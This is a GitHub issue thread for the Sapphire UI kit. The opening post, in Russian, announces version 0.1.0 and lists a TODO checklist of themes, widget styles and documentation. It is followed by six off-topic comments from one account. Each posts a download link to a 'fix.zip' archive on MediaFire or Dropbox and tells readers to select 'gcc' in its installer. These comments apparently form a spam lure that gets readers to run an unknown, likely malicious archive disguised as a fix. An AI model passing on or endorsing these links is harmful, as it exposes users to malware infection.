### ISSUE TITLE
Sapphire UI Kit 0.1.0

### ISSUE THREAD

**Issue by mskrasnov** [mskrasnov/sapphire_ui#5]
Первая стабильная версия Sapphire UI, включающая по сравнению со старой версией множество изменений, среди которых полное переписывание API, добавление новых виджетов, поддержка TOML-конфигов для тем (смена тем на сторонние пока не реализована) и добавление документации.

## TODO

- [x] REWRITE API!!!
- [ ] Add support for TOML-themes:
    - [x] default light theme
    - [ ] default dark theme
- Styles for:
    - [x] button;
    - [x] checkbox;
    - [ ] combobox;
    - [x] container;
    - [ ] pane_grid;
    - [ ] pick_list;
    - [ ] progress_bar;
    - [ ] radio;
    - [ ] rule;
    - [x] scrollable;
    - [x] slider;
    - [ ] svg;
    - [x] text_editor;
    - [x] text_input;
    - [ ] toggler;
    - [ ] tooltip;
    - [ ] vertical_slider;
- New widgets:
    - [ ] warning_box;
    - [ ] error_box;
    - [ ] info_box;
    - [ ] question_box;
    - [ ] success_box;
    - [x] group;
- **Documentation:**
    - [x] Basic usage;
    - [ ] Themes structure;
    - [x] Widget gallery;
    - [x] Examples;
- **Applications:**
    - [ ] Theme viewer/editor;
    - [x] Widget Gallery;

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
